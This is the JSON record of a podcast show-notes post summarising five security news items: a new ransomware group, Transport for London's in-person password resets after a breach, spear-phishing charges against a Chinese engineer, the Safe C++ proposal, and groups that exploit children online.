{"id":46515,"date":"2024-09-17T19:54:16","date_gmt":"2024-09-17T23:54:16","guid":{"rendered":"https:\/\/www.technewsday.com\/?p=46515"},"modified":"2025-05-31T22:45:56","modified_gmt":"2025-06-01T02:45:56","slug":"london-transit-insists-30000-employees-come-in-person-to-change-their-passwords-cyber-security-today-for-wednesday-september-18-2024","status":"publish","type":"post","link":"https:\/\/technewsday.com\/staging\/london-transit-insists-30000-employees-come-in-person-to-change-their-passwords-cyber-security-today-for-wednesday-september-18-2024\/","title":{"rendered":"London transit insists 30,000 employees come in person to change their passwords: Cyber Security Today for Wednesday, September 18, 2024"},"content":{"rendered":"<p><span style=\"font-weight: 400;\">New Ransomware Group Repellent Scorpius Emerges, London Transport Authority (TfL)\u00a0 Mandates In-Person Password Resets After Cyberattac,\u00a0 Chinese National Charged in Major Multi-Year Spear-Phishing Campaign,\u00a0 C++ Community Hits Back Against Critics and Cyber Crooks Aren\u2019t Only Stealing Data, Some Are a Real Threat to the Safety and Well Being of our kids.\u00a0<\/span><\/p>\n<p><iframe style=\"border: none;\" title=\"Embed Player\" src=\"https:\/\/play.libsyn.com\/embed\/episode\/id\/33099862\/height\/192\/theme\/modern\/size\/large\/thumbnail\/yes\/custom-color\/2f3336\/time-start\/00:00:00\/playlist-height\/200\/direction\/backward\/font-color\/FFFFFF\" width=\"100%\" height=\"192\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"><\/iframe><br \/>\n<span style=\"font-weight: 400;\">Palo Alto has issues a report on a new ransomware-as-a-service group called Repellent Scorpius has emerged, distributing the Cicada3301 ransomware. First detected in May 2024, the group is rapidly expanding its operations through an affiliate program.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Repellent Scorpius employs a double extortion scheme, encrypting systems and threatening to publish stolen data.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Initial access is often gained through stolen credentials, likely purchased from initial access brokers.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The group uses legitimate tools like PsExec and Rclone for lateral movement and data exfiltration making them more difficult to detect.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">And he Cicada3301 ransomware is a 64-bit binary written in Rust, using the ChaCha20 stream cipher for encryption indicating a high level of technical sophistication.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The group targets a wide range of sectors but avoids Commonwealth of Independent States countries &#8211; Russia and its allies.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Outside of the standard warnings to improve credential management having a strong backup strategy,\u00a0 IT teams might want to look for unauthorized use of legitimate tools like PsExec and Rclon<\/span><\/p>\n<p><span style=\"font-weight: 400;\">This group is relatively new and still growing. As Repellent Scorpius expands its affiliate program, Unit 42 is warning of an increase in Cicada3301 ransomware activity and victims.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Sources include: Unit 42 Incident Response team, Palo Alto Networks\u00a0 <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/repellent-scorpius-cicada3301-ransomware\/\"><span style=\"font-weight: 400;\">Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware (paloaltonetworks.com)<\/span><\/a><\/p>\n<p>***<\/p>\n<p><span style=\"font-weight: 400;\">Transport for London (TfL) is requiring all 30,000 employees to reset their passwords in person following a recent cybersecurity incident. This unprecedented move highlights the severity of the breach and the importance of identity verification in its aftermath<\/span><\/p>\n<p><span style=\"font-weight: 400;\">TfL disclosed the breach on September 2. Later updates revealed that customer and employee directory data, including email addresses and job titles, were accessed. The attack disrupted internal systems and online services, affecting customer refunds and responses.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">A 17-year-old suspect has been arrested by the UK&#8217;s National Crime Agency in connection with the attack.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">While the onsite validation of 30,000 employees may seem extreme, it mirrors similar actions taken by other organizations, such as DICK&#8217;S Sporting Goods, following cyberattacks, potentially signaling a new best practice in breach response.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Sources include: BleepingComputer, Transport for London<\/span><\/p>\n<p><a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/tfl-requires-in-person-password-resets-for-30-000-employees-after-hack\/\"><span style=\"font-weight: 400;\">https:\/\/www.bleepingcomputer.com\/news\/security\/tfl-requires-in-person-password-resets-for-30-000-employees-after-hack\/<\/span><\/a><\/p>\n<p>***<\/p>\n<p><span style=\"font-weight: 400;\">The U.S. Department of Justice has charged a Chinese national, Song Wu, for conducting a multi-year spear-phishing campaign targeting NASA, U.S. military branches, and the Federal Aviation Administration (FAA).<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Wu, a 39-year-old engineer at Aviation Industry Corporation of China (AVIC), allegedly impersonated U.S.-based researchers to obtain sensitive aerospace software.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Wu\u2019s Targets included NASA, the U.S. Air Force, Navy, Army, FAA, major research universities, and aerospace companies.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The campaign aimed to acquire specialized software and even source code used in aerospace engineering and computational fluid dynamics, potentially applicable to advanced tactical missiles and weapons design.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">After finally being caught, Wu faces 14 counts of wire fraud and 14 counts of aggravated identity theft, with potential sentences of up to 20 years per wire fraud charge.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">What\u2019s amazing about this is the way these nation states are playing the long game, taking years to build trust and gain access to systems that should be highly protected.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Organizations should not only review and strengthen their defenses, but reinforce this long term approach in their training and controls against highly sophisticated spear-phishing attacks, especially those handling sensitive or classified information.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Sources include: U.S. Department of Justice, Security Affairs<\/span><\/p>\n<p><a href=\"https:\/\/securityaffairs.com\/168514\/cyber-crime\/chinese-man-spear-phishing-nasa-us-government.html\"><span style=\"font-weight: 400;\">https:\/\/securityaffairs.com\/168514\/cyber-crime\/chinese-man-spear-phishing-nasa-us-government.html<\/span><\/a><\/p>\n<p><span style=\"font-weight: 400;\">The C++ community is hitting back at critics with a new Safe C++ Extensions proposal, which they claim is a significant step towards addressing memory safety issues that have long plagued the language. This move comes in response to growing pressure from the NSA, CISA, and the White House as well as many in the private sector for increased memory safety in software.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">That has led a movement towards more memory-safe languages like Rust and some vigorous debates, not all of which are technical. These conflicts resulted in the resignation of the head of the group attempting to implement Rust in the Linux kernel.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Proponents of C++ say their new proposal will add memory safety features to C++, addressing vulnerabilities like buffer overflows and use-after-free errors.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">They argue this approach allows for incremental adoption of safety features in existing C++ codebases, potentially reducing the need for complete rewrites in other languages.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">While promising, the effectiveness of these extensions in real-world scenarios remains to be seen.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">It will be interesting to see if this new movement can reverse the move towards Rust which Google has claimed is not only safer, but also makes developers more productive.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Sources include: The Register<\/span><\/p>\n<p><a href=\"https:\/\/www.theregister.com\/2024\/09\/16\/safe_c_plusplus\/?td=rt-3a\"><span style=\"font-weight: 400;\">https:\/\/www.theregister.com\/2024\/09\/16\/safe_c_plusplus\/?td=rt-3a<\/span><\/a><\/p>\n<p><span style=\"font-weight: 400;\">We normally focus on the impact of cyber crime on corporations, but there is an alarming trend as as<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Parents as well as cybersecurity professionals, there are urgent warnings about severe online dangers targeting children and teens.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Krebs on Security reported on recent investigations, echoed by Canada\u2019s RCMP which have uncovered organized groups using highly manipulative and harmful tactics on popular platforms<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Predatory groups are recruiting on mainstream platforms like Discord, Minecraft, Roblox, Steam, Telegram, and Twitch.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">These groups, such as &#8220;764&#8221;, use extortion, doxing, swatting, and harassment to victimize children.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Some are coercing minors into self-harm, even to the point of\u00a0 including carving abusers&#8217; aliases into their skin.\u00a0 Victims have been manipulated into harming themselves, family members, and pets. In extreme cases, this has led to suicide attempts.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">These victims are used in cyber-attacks but also used to produce content both political and sexual for their exploiters.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">&#8211; Implement strict monitoring and controls on children&#8217;s online activities<\/span><\/p>\n<p><span style=\"font-weight: 400;\">&#8211; Educate children about these specific dangers and manipulation tactics<\/span><\/p>\n<p><span style=\"font-weight: 400;\">&#8211; Report suspicious activities to platform moderators and law enforcement immediately<\/span><\/p>\n<p><span style=\"font-weight: 400;\">&#8211; Advocate for stronger safety measures and age verification on all youth-oriented platforms<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Sources include: Wired, Der Spiegel, Recorder, The Washington Post, Royal Canadian Mounted Police, KrebsOnSecurity<\/span><\/p>\n<p><span style=\"font-weight: 400;\">That\u2019s our show for today.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Show notes are at technewsday.ca or .com\u00a0<\/span><\/p>\n<p>I&#8217;m your host Jim Love. Thanks for listening.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>New Ransomware Group Repellent Scorpius Emerges, London Transport Authority (TfL)\u00a0 Mandates In-Person Password Resets After Cyberattac,\u00a0 Chinese National Charged in Major Multi-Year Spear-Phishing Campaign,\u00a0 C++ Community Hits Back Against Critics and Cyber Crooks Aren\u2019t Only Stealing Data, Some Are a Real Threat to the Safety and Well Being of our kids.\u00a0 Palo Alto has issues [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":46518,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"video","meta":{"_acf_changed":false,"footnotes":""},"categories":[1459,360],"tags":[741],"class_list":["post-46515","post","type-post","status-publish","format-video","has-post-thumbnail","hentry","category-cyber-security-today","category-podcasts","tag-podcasts-cyber-security-today","post_format-post-format-video"],"acf":[],"_links":{"self":[{"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/posts\/46515","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/comments?post=46515"}],"version-history":[{"count":3,"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/posts\/46515\/revisions"}],"predecessor-version":[{"id":46532,"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/posts\/46515\/revisions\/46532"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/media\/46518"}],"wp:attachment":[{"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/media?parent=46515"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/categories?post=46515"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/tags?post=46515"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}